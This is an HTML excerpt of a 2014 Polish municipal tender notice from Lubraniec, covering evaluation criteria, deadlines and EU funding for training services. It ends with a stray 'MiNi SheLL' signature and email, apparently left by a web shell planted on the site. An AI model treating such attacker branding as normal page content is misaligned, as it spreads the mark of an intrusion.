<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Łączna ilość osób przeszkolonych w ramach usług szkoleniowych należycie zrealizowanych przez Wykonawcę w okresie ostatnich 3 lat - 15</li>
<li>3 - Łączna ilość osób dla których Wykonawca świadczył doradztwo zawodowe w ramach  należycie zrealizowanych usług w okresie ostatnich 3 lat - 10</li>
<li>4 - Łączna ilość osób objęta szkoleniami wyjazdowymi w ramach usług należycie zrealizowanych przez Wykonawcę w okresie ostatnich 3 lat - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lubraniec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi  Ekonomiczno-Administracyjnej Szkół i  Przedszkola Samorządowego Gminy i Miasta Lubraniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2014 godzina 09:00, miejsce: Urząd Miejski w Lubrańcu
ulica Brzeska 49; 87-890 Lubraniec
sekretariat - pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IX POKL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com